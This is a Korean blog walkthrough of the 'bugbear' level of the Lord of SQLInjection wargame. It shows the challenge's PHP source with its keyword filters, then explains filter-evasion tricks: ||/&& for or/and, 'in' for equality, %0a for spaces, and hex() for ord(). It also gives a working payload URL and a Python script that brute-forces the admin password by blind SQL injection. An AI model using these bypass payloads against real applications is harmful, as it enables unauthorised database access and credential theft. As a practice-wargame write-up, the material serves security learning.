Lord of SQLInjection
los.rubiya.kr
bugbear
문제소스:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
$query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
highlight_file(__FILE__);
?>
|
cs |
pw의 길이를 구하기 위해서 저번에는 no = 1 or id like 0x61646d696e and length(pw) like 8 을 사용했지만,
공백, like, 0x 필터링으로 사용할 수 없게 됐다.
대신 더 우회를 하면 된다.
or, and => ||, &&
id = admin 은 id in ("admin") 으로 우회,
length(pw) like 8은 부등호을 이용해서 length(pw) > 7 && length(pw) < 9 로 우회해준다.
1 || id in ("admin") && length(pw) > 7 && length(pw) < 9
여기서 공백대신 %0a로 공백도 우회해 주면 된다.
1%0a||%0aid%0ain%0a("admin")%0a%26%26%0alength(pw)%0a>%0a7%0a%26%26%0alength(pw)%0a<%0a9
https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?no=1%0a||%0aid%0ain%0a(%22admin%22)%0a%26%26%0alength(pw)%0a%3E%0a7%0a%26%26%0alength(pw)%0a%3C%0a9
패스워드의 길이는 8이다.
이제 blind sqli을 위한 코드에서 우회한 문자로 바꿔주는 수정을 해주면 된다.
pw를 맞추는 코드는
1 || id in ("admin") && ord(mid(pw,1,1)) > 44 && ord(mid(pw,1,1)) < 46#
와 같은 형태가 된다. 위 조건이 True이면 ord(mid(pw,1,1))은 45가 되는 것이다.
근데 이걸로 했는데, 안된다.
왜 안됐는가 보니, ord()에서 or이 필터링 되고 있었다...
다른 함수를 써야하므로, or 때문에 걸러지는 ord()를 버리고 hex()를 새로 영입했다.
이제
1 || id in ("admin") && hex(mid(pw,1,1)) > hex(44) && hex(mid(pw,1,1)) < hex(46)#
이렇게 바꿔주면 된다.
ex.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
import urllib
import urllib2
import sys
import time
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="
key = ""
for i in range(8):
for j in range(len(string)):
#payload = "1' || '1'='1' &&(substring(pw,"+str(i+1)+",1)='"+string[j]+"')#"
#payload = "1' || '1'like'1' &&(mid(pw,"+str(i+1)+",1) like '"+string[j]+"')#"
#payload = "1 or id like 0x61646d696e and ord(mid(pw,"+str(i+1)+",1)) like "+str(ord(string[j]))+"#"
payload = "1 || id in (\"admin\") && hex(mid(pw,"+str(i+1)+",1)) > hex("+str(ord(string[j])-1)+") && hex(mid(pw,"+str(i+1)+",1)) < hex("+str(ord(string[j])+1)+")#"
payload = urllib.quote(payload)
payload = payload.replace("%20","%0a")
url = "https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?no="+payload
print url
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request(url)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
request.add_header('Cookie', 'your_cookie_value_here')
request.get_method = lambda:'GET'
data = opener.open(request)
data = data.read()
if "Hello admin" in data:
key += string[j]
print "[*] Find Password!! Password is ["+key+"]"
break
else:
print "[-] Fail!"
time.sleep(0.1)
|
cs |
공백 우회를 할 때, 16행에 미리 공백대신 %0a를 넣으면, %가 17행에서 %25로 인코딩된다.
그래서 17행 이후, 18행에서 공백인 %20을 %0a로 치환해주었다.
'WAR GAME > Lord of SQLi' 카테고리의 다른 글
| LORD OF SQL INJECTION [assassin] 풀이 (0) | 2019.11.06 |
|---|---|
| LORD OF SQL INJECTION [GIANT] 풀이 (0) | 2019.11.05 |
| LORD OF SQL INJECTION [darkknight] 풀이 (0) | 2019.11.02 |
| LORD OF SQL INJECTION [golem] 풀이 (0) | 2019.11.01 |
| LORD OF SQL INJECTION [SKELETON] 풀이 (0) | 2019.10.31 |